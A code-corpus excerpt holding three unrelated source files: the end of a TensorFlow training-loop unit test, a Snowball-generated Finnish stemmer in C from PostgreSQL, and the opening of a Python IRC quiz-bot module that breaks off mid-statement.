output_dir=self._output_dir,
train_op=constant_op.constant(1.0),
loss_op=loss_op)
# TODO(ptucker): Resume training from previous ckpt.
# TODO(ptucker): !supervisor_is_chief
# TODO(ptucker): Custom init op for training.
# TODO(ptucker): Mock supervisor, and assert all interactions.
def test_train(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
self._assert_summaries(self._output_dir)
self._assert_ckpt(self._output_dir, False)
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=1)
# TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
# SaverDef, so we can't add it to the summary assertion test below.
# meta_graph_def = meta_graph.create_meta_graph_def()
self.assertEqual(2.0, loss)
self._assert_summaries(self._output_dir, expected_graphs=[g])
self._assert_ckpt(self._output_dir, True)
def test_train_steps_is_incremental(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=10)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(10, step)
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
steps=15)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(25, step)
def test_train_max_steps_is_not_incremental(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
max_steps=10)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(10, step)
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=constant_op.constant(2.0),
max_steps=15)
step = checkpoint_utils.load_variable(
self._output_dir, variables_lib.get_global_step().name)
self.assertEqual(15, step)
def test_train_loss(self):
with ops.Graph().as_default() as g, self.test_session(g):
variables_lib.create_global_step()
loss_var = variables_lib.local_variable(10.0)
train_op = control_flow_ops.group(
state_ops.assign_add(variables_lib.get_global_step(), 1),
state_ops.assign_add(loss_var, -1.0))
self._assert_summaries(self._output_dir)
self._assert_ckpt(self._output_dir, False)
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=loss_var.value(),
steps=6)
# TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
# SaverDef, so we can't add it to the summary assertion test below.
# meta_graph_def = meta_graph.create_meta_graph_def()
self.assertEqual(4.0, loss)
self._assert_summaries(self._output_dir, expected_graphs=[g])
self._assert_ckpt(self._output_dir, True)
def test_train_summaries(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
loss_op = constant_op.constant(2.0)
summary.scalar('loss', loss_op)
self._assert_summaries(self._output_dir)
self._assert_ckpt(self._output_dir, False)
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=loss_op,
steps=1)
# TODO(ebrevdo,ptucker,ispir): this meta_graph_def lacks the
# SaverDef, so we can't add it to the summary assertion test below.
# meta_graph_def = meta_graph.create_meta_graph_def()
self.assertEqual(2.0, loss)
self._assert_summaries(
self._output_dir,
expected_graphs=[g],
expected_summaries={1: {
'loss': 2.0
}})
self._assert_ckpt(self._output_dir, True)
def test_train_chief_monitor(self):
with ops.Graph().as_default() as g, self.test_session(g):
with ops.control_dependencies(self._build_inference_graph()):
train_op = state_ops.assign_add(variables_lib.get_global_step(), 1)
loss_op = constant_op.constant(2.0)
summary.scalar('loss', loss_op)
chief_exclusive_monitor = _BaseMonitorWrapper(False)
all_workers_monitor = _BaseMonitorWrapper(True)
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
train_op=train_op,
loss_op=loss_op,
supervisor_is_chief=True,
steps=1,
monitors=[chief_exclusive_monitor, all_workers_monitor])
self.assertEqual(2.0, loss)
self.assertTrue(chief_exclusive_monitor.is_active and
all_workers_monitor.is_active,
'All monitors must have been active.')
self.assertTrue(chief_exclusive_monitor.has_step and
all_workers_monitor.has_step,
'All monitors must have a step.')
def test_train_worker_monitor(self):
# We need to explicitly set device due to check on non-chief workers
# requiring all variables to have a device assigned.
with ops.Graph().as_default() as g, g.device('/cpu:0'):
global_step = variables_lib.create_global_step(g)
train_op = state_ops.assign_add(global_step, 1)
loss_op = constant_op.constant(2.0)
summary.scalar('loss', loss_op)
# Add explicit "local" init op to initialize all variables
# as there's no chief to init here.
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, init_op)
# Create worker monitors where one should be active on the worker
# and the other chief exclusive.
chief_exclusive_monitor = _BaseMonitorWrapper(False)
all_workers_monitor = _BaseMonitorWrapper(True)
with self.test_session(g):
loss = learn.graph_actions.train(
g,
output_dir=self._output_dir,
global_step_tensor=global_step,
train_op=train_op,
loss_op=loss_op,
supervisor_is_chief=False,
steps=1,
monitors=[chief_exclusive_monitor, all_workers_monitor])
self.assertEqual(2.0, loss)
self.assertTrue(not chief_exclusive_monitor.is_active and
all_workers_monitor.is_active,
'Only non-chief runnable monitor must have been active.')
self.assertTrue(not chief_exclusive_monitor.has_step and
all_workers_monitor.has_step,
'Only non-chief runnable monitor must have a step.')
if __name__ == '__main__':
test.main() | unknown | codeparrot/codeparrot-clean | ||
/* Generated from finnish.sbl by Snowball 3.0.0 - https://snowballstem.org/ */
#include "stem_ISO_8859_1_finnish.h"
#include <stddef.h>
#include "snowball_runtime.h"
struct SN_local {
struct SN_env z;
int i_p2;
int i_p1;
unsigned char b_ending_removed;
symbol * s_x;
};
typedef struct SN_local SN_local;
#ifdef __cplusplus
extern "C" {
#endif
extern int finnish_ISO_8859_1_stem(struct SN_env * z);
#ifdef __cplusplus
}
#endif
static int r_tidy(struct SN_env * z);
static int r_other_endings(struct SN_env * z);
static int r_t_plural(struct SN_env * z);
static int r_i_plural(struct SN_env * z);
static int r_case_ending(struct SN_env * z);
static int r_VI(struct SN_env * z);
static int r_LONG(struct SN_env * z);
static int r_possessive(struct SN_env * z);
static int r_particle_etc(struct SN_env * z);
static int r_R2(struct SN_env * z);
static int r_mark_regions(struct SN_env * z);
static const symbol s_0[] = { 'k', 's', 'e' };
static const symbol s_1[] = { 'k', 's', 'i' };
static const symbol s_2[] = { 'i', 'e' };
static const symbol s_3[] = { 'p', 'o' };
static const symbol s_4[] = { 'p', 'o' };
static const symbol s_0_0[2] = { 'p', 'a' };
static const symbol s_0_1[3] = { 's', 't', 'i' };
static const symbol s_0_2[4] = { 'k', 'a', 'a', 'n' };
static const symbol s_0_3[3] = { 'h', 'a', 'n' };
static const symbol s_0_4[3] = { 'k', 'i', 'n' };
static const symbol s_0_5[3] = { 'h', 0xE4, 'n' };
static const symbol s_0_6[4] = { 'k', 0xE4, 0xE4, 'n' };
static const symbol s_0_7[2] = { 'k', 'o' };
static const symbol s_0_8[2] = { 'p', 0xE4 };
static const symbol s_0_9[2] = { 'k', 0xF6 };
static const struct among a_0[10] = {
{ 2, s_0_0, 0, 1, 0},
{ 3, s_0_1, 0, 2, 0},
{ 4, s_0_2, 0, 1, 0},
{ 3, s_0_3, 0, 1, 0},
{ 3, s_0_4, 0, 1, 0},
{ 3, s_0_5, 0, 1, 0},
{ 4, s_0_6, 0, 1, 0},
{ 2, s_0_7, 0, 1, 0},
{ 2, s_0_8, 0, 1, 0},
{ 2, s_0_9, 0, 1, 0}
};
static const symbol s_1_0[3] = { 'l', 'l', 'a' };
static const symbol s_1_1[2] = { 'n', 'a' };
static const symbol s_1_2[3] = { 's', 's', 'a' };
static const symbol s_1_3[2] = { 't', 'a' };
static const symbol s_1_4[3] = { 'l', 't', 'a' };
static const symbol s_1_5[3] = { 's', 't', 'a' };
static const struct among a_1[6] = {
{ 3, s_1_0, 0, -1, 0},
{ 2, s_1_1, 0, -1, 0},
{ 3, s_1_2, 0, -1, 0},
{ 2, s_1_3, 0, -1, 0},
{ 3, s_1_4, -1, -1, 0},
{ 3, s_1_5, -2, -1, 0}
};
static const symbol s_2_0[3] = { 'l', 'l', 0xE4 };
static const symbol s_2_1[2] = { 'n', 0xE4 };
static const symbol s_2_2[3] = { 's', 's', 0xE4 };
static const symbol s_2_3[2] = { 't', 0xE4 };
static const symbol s_2_4[3] = { 'l', 't', 0xE4 };
static const symbol s_2_5[3] = { 's', 't', 0xE4 };
static const struct among a_2[6] = {
{ 3, s_2_0, 0, -1, 0},
{ 2, s_2_1, 0, -1, 0},
{ 3, s_2_2, 0, -1, 0},
{ 2, s_2_3, 0, -1, 0},
{ 3, s_2_4, -1, -1, 0},
{ 3, s_2_5, -2, -1, 0}
};
static const symbol s_3_0[3] = { 'l', 'l', 'e' };
static const symbol s_3_1[3] = { 'i', 'n', 'e' };
static const struct among a_3[2] = {
{ 3, s_3_0, 0, -1, 0},
{ 3, s_3_1, 0, -1, 0}
};
static const symbol s_4_0[3] = { 'n', 's', 'a' };
static const symbol s_4_1[3] = { 'm', 'm', 'e' };
static const symbol s_4_2[3] = { 'n', 'n', 'e' };
static const symbol s_4_3[2] = { 'n', 'i' };
static const symbol s_4_4[2] = { 's', 'i' };
static const symbol s_4_5[2] = { 'a', 'n' };
static const symbol s_4_6[2] = { 'e', 'n' };
static const symbol s_4_7[2] = { 0xE4, 'n' };
static const symbol s_4_8[3] = { 'n', 's', 0xE4 };
static const struct among a_4[9] = {
{ 3, s_4_0, 0, 3, 0},
{ 3, s_4_1, 0, 3, 0},
{ 3, s_4_2, 0, 3, 0},
{ 2, s_4_3, 0, 2, 0},
{ 2, s_4_4, 0, 1, 0},
{ 2, s_4_5, 0, 4, 0},
{ 2, s_4_6, 0, 6, 0},
{ 2, s_4_7, 0, 5, 0},
{ 3, s_4_8, 0, 3, 0}
};
static const symbol s_5_0[2] = { 'a', 'a' };
static const symbol s_5_1[2] = { 'e', 'e' };
static const symbol s_5_2[2] = { 'i', 'i' };
static const symbol s_5_3[2] = { 'o', 'o' };
static const symbol s_5_4[2] = { 'u', 'u' };
static const symbol s_5_5[2] = { 0xE4, 0xE4 };
static const symbol s_5_6[2] = { 0xF6, 0xF6 };
static const struct among a_5[7] = {
{ 2, s_5_0, 0, -1, 0},
{ 2, s_5_1, 0, -1, 0},
{ 2, s_5_2, 0, -1, 0},
{ 2, s_5_3, 0, -1, 0},
{ 2, s_5_4, 0, -1, 0},
{ 2, s_5_5, 0, -1, 0},
{ 2, s_5_6, 0, -1, 0}
};
static const symbol s_6_0[1] = { 'a' };
static const symbol s_6_1[3] = { 'l', 'l', 'a' };
static const symbol s_6_2[2] = { 'n', 'a' };
static const symbol s_6_3[3] = { 's', 's', 'a' };
static const symbol s_6_4[2] = { 't', 'a' };
static const symbol s_6_5[3] = { 'l', 't', 'a' };
static const symbol s_6_6[3] = { 's', 't', 'a' };
static const symbol s_6_7[3] = { 't', 't', 'a' };
static const symbol s_6_8[3] = { 'l', 'l', 'e' };
static const symbol s_6_9[3] = { 'i', 'n', 'e' };
static const symbol s_6_10[3] = { 'k', 's', 'i' };
static const symbol s_6_11[1] = { 'n' };
static const symbol s_6_12[3] = { 'h', 'a', 'n' };
static const symbol s_6_13[3] = { 'd', 'e', 'n' };
static const symbol s_6_14[4] = { 's', 'e', 'e', 'n' };
static const symbol s_6_15[3] = { 'h', 'e', 'n' };
static const symbol s_6_16[4] = { 't', 't', 'e', 'n' };
static const symbol s_6_17[3] = { 'h', 'i', 'n' };
static const symbol s_6_18[4] = { 's', 'i', 'i', 'n' };
static const symbol s_6_19[3] = { 'h', 'o', 'n' };
static const symbol s_6_20[3] = { 'h', 0xE4, 'n' };
static const symbol s_6_21[3] = { 'h', 0xF6, 'n' };
static const symbol s_6_22[1] = { 0xE4 };
static const symbol s_6_23[3] = { 'l', 'l', 0xE4 };
static const symbol s_6_24[2] = { 'n', 0xE4 };
static const symbol s_6_25[3] = { 's', 's', 0xE4 };
static const symbol s_6_26[2] = { 't', 0xE4 };
static const symbol s_6_27[3] = { 'l', 't', 0xE4 };
static const symbol s_6_28[3] = { 's', 't', 0xE4 };
static const symbol s_6_29[3] = { 't', 't', 0xE4 };
static const struct among a_6[30] = {
{ 1, s_6_0, 0, 8, 0},
{ 3, s_6_1, -1, -1, 0},
{ 2, s_6_2, -2, -1, 0},
{ 3, s_6_3, -3, -1, 0},
{ 2, s_6_4, -4, -1, 0},
{ 3, s_6_5, -1, -1, 0},
{ 3, s_6_6, -2, -1, 0},
{ 3, s_6_7, -3, 2, 0},
{ 3, s_6_8, 0, -1, 0},
{ 3, s_6_9, 0, -1, 0},
{ 3, s_6_10, 0, -1, 0},
{ 1, s_6_11, 0, 7, 0},
{ 3, s_6_12, -1, 1, 0},
{ 3, s_6_13, -2, -1, 1},
{ 4, s_6_14, -3, -1, 2},
{ 3, s_6_15, -4, 2, 0},
{ 4, s_6_16, -5, -1, 1},
{ 3, s_6_17, -6, 3, 0},
{ 4, s_6_18, -7, -1, 1},
{ 3, s_6_19, -8, 4, 0},
{ 3, s_6_20, -9, 5, 0},
{ 3, s_6_21, -10, 6, 0},
{ 1, s_6_22, 0, 8, 0},
{ 3, s_6_23, -1, -1, 0},
{ 2, s_6_24, -2, -1, 0},
{ 3, s_6_25, -3, -1, 0},
{ 2, s_6_26, -4, -1, 0},
{ 3, s_6_27, -1, -1, 0},
{ 3, s_6_28, -2, -1, 0},
{ 3, s_6_29, -3, 2, 0}
};
static int af_6(struct SN_env * z) {
switch (z->af) {
case 1: return r_VI(z);
case 2: return r_LONG(z);
}
return -1;
}
static const symbol s_7_0[3] = { 'e', 'j', 'a' };
static const symbol s_7_1[3] = { 'm', 'm', 'a' };
static const symbol s_7_2[4] = { 'i', 'm', 'm', 'a' };
static const symbol s_7_3[3] = { 'm', 'p', 'a' };
static const symbol s_7_4[4] = { 'i', 'm', 'p', 'a' };
static const symbol s_7_5[3] = { 'm', 'm', 'i' };
static const symbol s_7_6[4] = { 'i', 'm', 'm', 'i' };
static const symbol s_7_7[3] = { 'm', 'p', 'i' };
static const symbol s_7_8[4] = { 'i', 'm', 'p', 'i' };
static const symbol s_7_9[3] = { 'e', 'j', 0xE4 };
static const symbol s_7_10[3] = { 'm', 'm', 0xE4 };
static const symbol s_7_11[4] = { 'i', 'm', 'm', 0xE4 };
static const symbol s_7_12[3] = { 'm', 'p', 0xE4 };
static const symbol s_7_13[4] = { 'i', 'm', 'p', 0xE4 };
static const struct among a_7[14] = {
{ 3, s_7_0, 0, -1, 0},
{ 3, s_7_1, 0, 1, 0},
{ 4, s_7_2, -1, -1, 0},
{ 3, s_7_3, 0, 1, 0},
{ 4, s_7_4, -1, -1, 0},
{ 3, s_7_5, 0, 1, 0},
{ 4, s_7_6, -1, -1, 0},
{ 3, s_7_7, 0, 1, 0},
{ 4, s_7_8, -1, -1, 0},
{ 3, s_7_9, 0, -1, 0},
{ 3, s_7_10, 0, 1, 0},
{ 4, s_7_11, -1, -1, 0},
{ 3, s_7_12, 0, 1, 0},
{ 4, s_7_13, -1, -1, 0}
};
static const symbol s_9_0[3] = { 'm', 'm', 'a' };
static const symbol s_9_1[4] = { 'i', 'm', 'm', 'a' };
static const struct among a_9[2] = {
{ 3, s_9_0, 0, 1, 0},
{ 4, s_9_1, -1, -1, 0}
};
static const unsigned char g_AEI[] = { 17, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8 };
static const unsigned char g_C[] = { 119, 223, 119, 1 };
static const unsigned char g_V1[] = { 17, 65, 16, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
static const unsigned char g_V2[] = { 17, 65, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
static const unsigned char g_particle_end[] = { 17, 97, 24, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 32 };
static int r_mark_regions(struct SN_env * z) {
((SN_local *)z)->i_p1 = z->l;
((SN_local *)z)->i_p2 = z->l;
{
int ret = out_grouping(z, g_V1, 97, 246, 1);
if (ret < 0) return 0;
z->c += ret;
}
{
int ret = in_grouping(z, g_V1, 97, 246, 1);
if (ret < 0) return 0;
z->c += ret;
}
((SN_local *)z)->i_p1 = z->c;
{
int ret = out_grouping(z, g_V1, 97, 246, 1);
if (ret < 0) return 0;
z->c += ret;
}
{
int ret = in_grouping(z, g_V1, 97, 246, 1);
if (ret < 0) return 0;
z->c += ret;
}
((SN_local *)z)->i_p2 = z->c;
return 1;
}
static int r_R2(struct SN_env * z) {
return ((SN_local *)z)->i_p2 <= z->c;
}
static int r_particle_etc(struct SN_env * z) {
int among_var;
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
z->ket = z->c;
among_var = find_among_b(z, a_0, 10, 0);
if (!among_var) { z->lb = v_1; return 0; }
z->bra = z->c;
z->lb = v_1;
}
switch (among_var) {
case 1:
if (in_grouping_b(z, g_particle_end, 97, 246, 0)) return 0;
break;
case 2:
{
int ret = r_R2(z);
if (ret <= 0) return ret;
}
break;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
return 1;
}
static int r_possessive(struct SN_env * z) {
int among_var;
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
z->ket = z->c;
among_var = find_among_b(z, a_4, 9, 0);
if (!among_var) { z->lb = v_1; return 0; }
z->bra = z->c;
z->lb = v_1;
}
switch (among_var) {
case 1:
{
int v_2 = z->l - z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 'k') goto lab0;
z->c--;
return 0;
lab0:
z->c = z->l - v_2;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
break;
case 2:
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
z->ket = z->c;
if (!(eq_s_b(z, 3, s_0))) return 0;
z->bra = z->c;
{
int ret = slice_from_s(z, 3, s_1);
if (ret < 0) return ret;
}
break;
case 3:
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
break;
case 4:
if (z->c - 1 <= z->lb || z->p[z->c - 1] != 97) return 0;
if (!find_among_b(z, a_1, 6, 0)) return 0;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
break;
case 5:
if (z->c - 1 <= z->lb || z->p[z->c - 1] != 228) return 0;
if (!find_among_b(z, a_2, 6, 0)) return 0;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
break;
case 6:
if (z->c - 2 <= z->lb || z->p[z->c - 1] != 101) return 0;
if (!find_among_b(z, a_3, 2, 0)) return 0;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
break;
}
return 1;
}
static int r_LONG(struct SN_env * z) {
return find_among_b(z, a_5, 7, 0) != 0;
}
static int r_VI(struct SN_env * z) {
if (z->c <= z->lb || z->p[z->c - 1] != 'i') return 0;
z->c--;
return !in_grouping_b(z, g_V2, 97, 246, 0);
}
static int r_case_ending(struct SN_env * z) {
int among_var;
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
z->ket = z->c;
among_var = find_among_b(z, a_6, 30, af_6);
if (!among_var) { z->lb = v_1; return 0; }
z->bra = z->c;
z->lb = v_1;
}
switch (among_var) {
case 1:
if (z->c <= z->lb || z->p[z->c - 1] != 'a') return 0;
z->c--;
break;
case 2:
if (z->c <= z->lb || z->p[z->c - 1] != 'e') return 0;
z->c--;
break;
case 3:
if (z->c <= z->lb || z->p[z->c - 1] != 'i') return 0;
z->c--;
break;
case 4:
if (z->c <= z->lb || z->p[z->c - 1] != 'o') return 0;
z->c--;
break;
case 5:
if (z->c <= z->lb || z->p[z->c - 1] != 0xE4) return 0;
z->c--;
break;
case 6:
if (z->c <= z->lb || z->p[z->c - 1] != 0xF6) return 0;
z->c--;
break;
case 7:
{
int v_2 = z->l - z->c;
{
int v_3 = z->l - z->c;
do {
int v_4 = z->l - z->c;
{
int ret = r_LONG(z);
if (ret == 0) goto lab1;
if (ret < 0) return ret;
}
break;
lab1:
z->c = z->l - v_4;
if (!(eq_s_b(z, 2, s_2))) { z->c = z->l - v_2; goto lab0; }
} while (0);
z->c = z->l - v_3;
if (z->c <= z->lb) { z->c = z->l - v_2; goto lab0; }
z->c--;
}
z->bra = z->c;
lab0:
;
}
break;
case 8:
if (in_grouping_b(z, g_V1, 97, 246, 0)) return 0;
if (in_grouping_b(z, g_C, 98, 122, 0)) return 0;
break;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
((SN_local *)z)->b_ending_removed = 1;
return 1;
}
static int r_other_endings(struct SN_env * z) {
int among_var;
{
int v_1;
if (z->c < ((SN_local *)z)->i_p2) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p2;
z->ket = z->c;
among_var = find_among_b(z, a_7, 14, 0);
if (!among_var) { z->lb = v_1; return 0; }
z->bra = z->c;
z->lb = v_1;
}
switch (among_var) {
case 1:
{
int v_2 = z->l - z->c;
if (!(eq_s_b(z, 2, s_3))) goto lab0;
return 0;
lab0:
z->c = z->l - v_2;
}
break;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
return 1;
}
static int r_i_plural(struct SN_env * z) {
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
z->ket = z->c;
if (z->c <= z->lb || (z->p[z->c - 1] != 105 && z->p[z->c - 1] != 106)) { z->lb = v_1; return 0; }
z->c--;
z->bra = z->c;
z->lb = v_1;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
return 1;
}
static int r_t_plural(struct SN_env * z) {
int among_var;
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
z->ket = z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 't') { z->lb = v_1; return 0; }
z->c--;
z->bra = z->c;
{
int v_2 = z->l - z->c;
if (in_grouping_b(z, g_V1, 97, 246, 0)) { z->lb = v_1; return 0; }
z->c = z->l - v_2;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
z->lb = v_1;
}
{
int v_3;
if (z->c < ((SN_local *)z)->i_p2) return 0;
v_3 = z->lb; z->lb = ((SN_local *)z)->i_p2;
z->ket = z->c;
if (z->c - 2 <= z->lb || z->p[z->c - 1] != 97) { z->lb = v_3; return 0; }
among_var = find_among_b(z, a_9, 2, 0);
if (!among_var) { z->lb = v_3; return 0; }
z->bra = z->c;
z->lb = v_3;
}
switch (among_var) {
case 1:
{
int v_4 = z->l - z->c;
if (!(eq_s_b(z, 2, s_4))) goto lab0;
return 0;
lab0:
z->c = z->l - v_4;
}
break;
}
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
return 1;
}
static int r_tidy(struct SN_env * z) {
{
int v_1;
if (z->c < ((SN_local *)z)->i_p1) return 0;
v_1 = z->lb; z->lb = ((SN_local *)z)->i_p1;
{
int v_2 = z->l - z->c;
{
int v_3 = z->l - z->c;
{
int ret = r_LONG(z);
if (ret == 0) goto lab0;
if (ret < 0) return ret;
}
z->c = z->l - v_3;
z->ket = z->c;
if (z->c <= z->lb) goto lab0;
z->c--;
z->bra = z->c;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
}
lab0:
z->c = z->l - v_2;
}
{
int v_4 = z->l - z->c;
z->ket = z->c;
if (in_grouping_b(z, g_AEI, 97, 228, 0)) goto lab1;
z->bra = z->c;
if (in_grouping_b(z, g_C, 98, 122, 0)) goto lab1;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
lab1:
z->c = z->l - v_4;
}
{
int v_5 = z->l - z->c;
z->ket = z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 'j') goto lab2;
z->c--;
z->bra = z->c;
do {
int v_6 = z->l - z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 'o') goto lab3;
z->c--;
break;
lab3:
z->c = z->l - v_6;
if (z->c <= z->lb || z->p[z->c - 1] != 'u') goto lab2;
z->c--;
} while (0);
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
lab2:
z->c = z->l - v_5;
}
{
int v_7 = z->l - z->c;
z->ket = z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 'o') goto lab4;
z->c--;
z->bra = z->c;
if (z->c <= z->lb || z->p[z->c - 1] != 'j') goto lab4;
z->c--;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
lab4:
z->c = z->l - v_7;
}
z->lb = v_1;
}
if (in_grouping_b(z, g_V1, 97, 246, 1) < 0) return 0;
z->ket = z->c;
if (in_grouping_b(z, g_C, 98, 122, 0)) return 0;
z->bra = z->c;
{
int ret = slice_to(z, &((SN_local *)z)->s_x);
if (ret < 0) return ret;
}
if (!(eq_v_b(z, ((SN_local *)z)->s_x))) return 0;
{
int ret = slice_del(z);
if (ret < 0) return ret;
}
return 1;
}
extern int finnish_ISO_8859_1_stem(struct SN_env * z) {
{
int v_1 = z->c;
{
int ret = r_mark_regions(z);
if (ret < 0) return ret;
}
z->c = v_1;
}
((SN_local *)z)->b_ending_removed = 0;
z->lb = z->c; z->c = z->l;
{
int v_2 = z->l - z->c;
{
int ret = r_particle_etc(z);
if (ret < 0) return ret;
}
z->c = z->l - v_2;
}
{
int v_3 = z->l - z->c;
{
int ret = r_possessive(z);
if (ret < 0) return ret;
}
z->c = z->l - v_3;
}
{
int v_4 = z->l - z->c;
{
int ret = r_case_ending(z);
if (ret < 0) return ret;
}
z->c = z->l - v_4;
}
{
int v_5 = z->l - z->c;
{
int ret = r_other_endings(z);
if (ret < 0) return ret;
}
z->c = z->l - v_5;
}
do {
if (!((SN_local *)z)->b_ending_removed) goto lab0;
{
int v_6 = z->l - z->c;
{
int ret = r_i_plural(z);
if (ret < 0) return ret;
}
z->c = z->l - v_6;
}
break;
lab0:
{
int v_7 = z->l - z->c;
{
int ret = r_t_plural(z);
if (ret < 0) return ret;
}
z->c = z->l - v_7;
}
} while (0);
{
int v_8 = z->l - z->c;
{
int ret = r_tidy(z);
if (ret < 0) return ret;
}
z->c = z->l - v_8;
}
z->c = z->lb;
return 1;
}
extern struct SN_env * finnish_ISO_8859_1_create_env(void) {
struct SN_env * z = SN_new_env(sizeof(SN_local));
if (z) {
((SN_local *)z)->b_ending_removed = 0;
((SN_local *)z)->s_x = NULL;
((SN_local *)z)->i_p2 = 0;
((SN_local *)z)->i_p1 = 0;
if ((((SN_local *)z)->s_x = create_s()) == NULL) {
finnish_ISO_8859_1_close_env(z);
return NULL;
}
}
return z;
}
extern void finnish_ISO_8859_1_close_env(struct SN_env * z) {
if (z) {
lose_s(((SN_local *)z)->s_x);
}
SN_delete_env(z);
} | c | github | https://github.com/postgres/postgres | src/backend/snowball/libstemmer/stem_ISO_8859_1_finnish.c |
import os
import json
import time
import re
import random
from modules import userDatabase
class CaseInsensitiveDict(dict):
def __contains__(self, key):
return dict.__contains__(self, key.lower())
def __getitem__(self, key):
return dict.__getitem__(self, key.lower())
def __setitem__(self, key, value):
return dict.__setitem__(self, key.lower(), value)
tmp_quiz_data = CaseInsensitiveDict()
quiz_data = {'questions': list()}
# quizData = { "questions" : [{ "question" : cmd[1],
# "answers" : [ cmd[3] ],
# "bestTime" : [ "" , 0.0 ],
# "answeredCorrect" : 0,
# "answeredIncorrect" : 0,
# "answeredCorrectMessage" : "",
# "showAnswers" : True,
#
# "timePeriod" : float(cmd[2]),
# "creator" : sender[0],
# "createdTime" : time.time()
# } ]}
def save_quiz_database():
file = open('./resources/quiz.dat', 'w')
json.dump(quiz_data, file)
file.close()
def load_quiz_database():
global quiz_data
file = open('./resources/quiz.dat', 'r')
quiz_data = json.load(file)
file.close()
def on_init(irc):
if os.path.isfile("./resources/quiz.dat"):
load_quiz_database()
else:
save_quiz_database()
def on_process_forever(bot):
current_time = time.time()
for channel in tmp_quiz_data:
if tmp_quiz_data[channel.lower()]['isActive']:
time_difference = current_time - tmp_quiz_data[channel]["startTime"]
if time_difference >= tmp_quiz_data[channel]["timePeriod"]:
if len(tmp_quiz_data[channel]["players"].keys()) > 1:
bot.send_private_message(channel, '5Quiz automatically finished - No one got the right answer.')
else:
bot.send_private_message(channel, '5Quiz automatically finished - Time in the round ended.')
save_quiz_database()
del tmp_quiz_data[channel]
return
def on_channel_pm(irc, user_mask, user, channel, message):
global tmp_quiz_data, quiz_data
command = message.split()
for chan in tmp_quiz_data:
if message.lower() in tmp_quiz_data[chan]["wrongAnswers"] or message.lower() == tmp_quiz_data[chan]["rightAnswer"]:
if user.lower() not in tmp_quiz_data[chan]['players']:
tmp_quiz_data[chan]['players'][user.lower()] = 0
if tmp_quiz_data[chan]['players'][user.lower()] == 0:
if message.lower() == tmp_quiz_data[chan]["rightAnswer"].lower():
real_time_secs = time.time()
irc.userData[user.lower()]["quiz"]["correct"] += 1
userDatabase.save_user_database(irc)
irc.send_private_message(channel,
